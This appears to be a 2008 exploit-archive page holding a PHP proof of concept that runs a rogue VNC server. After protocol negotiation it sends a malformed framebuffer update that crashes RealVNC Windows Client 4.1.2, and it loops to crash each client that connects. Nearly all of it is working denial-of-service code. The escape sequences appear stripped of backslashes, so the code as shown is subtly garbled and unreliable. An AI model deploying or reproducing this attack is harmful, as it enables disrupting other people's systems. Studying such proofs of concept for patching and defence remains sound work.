[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : RealVNC Windows Client 4.1.2 Remote DOS Crash PoC
# Published : 2008-08-01
# Author : beford
# Previous Title : Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
# Next Title : F-PROT antivirus 6.2.1.4252 (malformed archive) Infinite Loop DoS Exploit
#!/usr/bin/php
<?php
# RealVNC Windows Client DoS
# AppName: vncviewer.exe
# AppVer: 4.1.2.0
# ModName: vncviewer.exe
# ModVer: 4.1.2.0
# Offset: 000229e0
function vncear() {
$port = "5900";
$ser = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_set_option($ser,SOL_SOCKET,SO_REUSEADDR,1);
socket_bind($ser,"0.0.0.0", $port);
socket_listen($ser, 5);
print "n[+] listening on $port ...n";
$crashvnc = socket_accept($ser);
print "[+] client connectedn";
// ProtocolVersion
socket_write($crashvnc, "RFB 003.008n");
while($i=socket_read($crashvnc, 1024)) if(substr($i,0,6) == "RFB 00") break;
print "tprotocol has been negotiatedn";
// Security type none
socket_write($crashvnc, "x01x01");
while($i=socket_read($crashvnc, 1024)) if(ord($i[0])==1)break;
//$i=socket_read($crashvnc, 124);
print "tsecurity type acceptedn";
// SecurityResult ok
socket_write($crashvnc, "x00x00x00x00");
while($i=socket_read($crashvnc, 1024))
if(ord($i[0])==0 || ord($i[0])==1)break;
//
socket_write($crashvnc, "x04x00". //frame buffer width
"x03x00". //frame buffer height
/* pixel format */
"x20". //bits per pixel
"x18". //depth
"x00". // big endian flag
"x01". // true color flag
"x00xFF". //red max
"x00xFF". //green max
"x00xFF". //blue max
"x10". //red shift
"x08". //green shift
"x00". //blue shift
"x00x00x00". //padding
/* pixel format */
"x00x00x00x08". //name lenght
"x41x4Ex59x55x4Cx49x4Ex41" // name ANYULINA
);
socket_write($crashvnc,
"x00x00x00x03". //frame buffer update
"x00x05xFFxFFx00x11x00x14xFFxFFxFFx11".
"x3Fx3Fx3Fx3Fx00x00x00x3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3F".
"x3Fx00x3Fx3Fx00x3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx00x3F".
"x3Fx00x3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx00x3Fx3Fx00x3F".
"x3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx00x3Fx3Fx00x3Fx3Fx3Fx3F".
"x3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx00x3Fx3Fx00x00x00x3Fx3Fx3Fx3Fx3F".
"x3Fx3Fx3Fx3Fx3Fx3Fx00x3Fx3Fx00x3Fx3Fx00x00x00x3Fx3Fx3Fx3Fx3F".
"x3Fx3Fx3Fx00x3Fx3Fx00x3Fx3Fx00x3Fx3Fx00x3Fx3Fx3Fx3Fx00x00x3F".
"x00x3Fx3Fx00x3Fx3Fx00x3Fx3F".
"x00x00x00x3F".
"x00x3Fx3Fx00x00x3Fx3F".
"x00x3Fx3Fx00x3Fx3Fx00x3Fx3Fx00x00x3Fx3Fx3Fx00x3F".
"x3Fx3Fx3Fx3Fx3Fx3Fx3F".
"x00x3Fx3Fx00x3Fx00x3Fx3Fx00".
"x3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3F".
"x00x3Fx3Fx00x3F".
"x00x3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx00x3Fx3Fx00".
"x3Fx00x3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx00x3Fx3F".
"x00x3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx00x3F".
"x3Fx3Fx00x3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx00".
"x3Fx3Fx3Fx3Fx00x3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx00".
"x3Fx3Fx3Fx3Fx3Fx00x3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3Fx3F".
"x00x3Fx3Fx3Fx3Fx3Fx00x00x3Fx3Fx3Fx3Fx3Fx3Fx3Fx3F".
"x00x3Fx3Fx3Fx3Fx3Fx3Fx00x3F".
"x00x3Fx3Fx3Fx3Fx3Fx3Fx3Fx00x3Fx3Fx06".
"x00x00x0Fx00x00x0Fx00x00x0Fx00x00".
"x0Fx00x00x0FxC0x00x0FxF8x00x0FxFCx00x6FxFFx00xFF".
"xFFx80xFFxFFx80x7FxFFx80x3FxFFx80x3FxFFx80x3FxFF".
"x80x1FxFFx80x0FxFFx00x0FxFFx00x07xFEx00x03xFEx00".
"x00x00x00x00x04x00x03x00x00x00x00x10x00x00x94xFA");
print "tit should be dead already";
while(socket_read($crashvnc, 1024)) print ".";
socket_close($crashvnc);
socket_close($ser);
}
print "RealVNC Windows Client DoS (http://realvnc.com/)n";
for (;;)
vncear();
?>
# www.Syue.com [2008-08-01]